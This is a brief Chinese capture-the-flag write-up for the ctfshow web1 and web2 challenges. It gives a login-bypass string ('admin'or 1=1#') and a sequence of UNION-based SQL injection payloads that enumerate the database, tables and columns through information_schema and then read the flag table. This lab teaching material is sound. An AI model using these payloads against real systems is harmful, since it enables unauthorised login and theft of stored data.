ctfshow-WEB-web1和web2
作者:互联网
wb1
直接看源码
web2
1、试试万能密码
登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中得到显示位
admin'or 1=1#
2、进行测试,测试一下回显位置
a' union select 1,2,3 #
得到回显为2
3、
获取当前使用的数据库
a' union select 1,database(),3 #
4、进行爆表
a' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='web2'),3#
4、进行爆字段
a' union select 1, (select group_concat(column_name) from information_schema.columns where table_schema='web2' and table_name='flag') ,3 #
5、获取flag表的数据
a'union select 1,(select flag from flag),3#
标签:WEB,union,web2,flag,web1,table,select,schema 来源: https://www.cnblogs.com/Rammstein-and-rock/p/16183393.html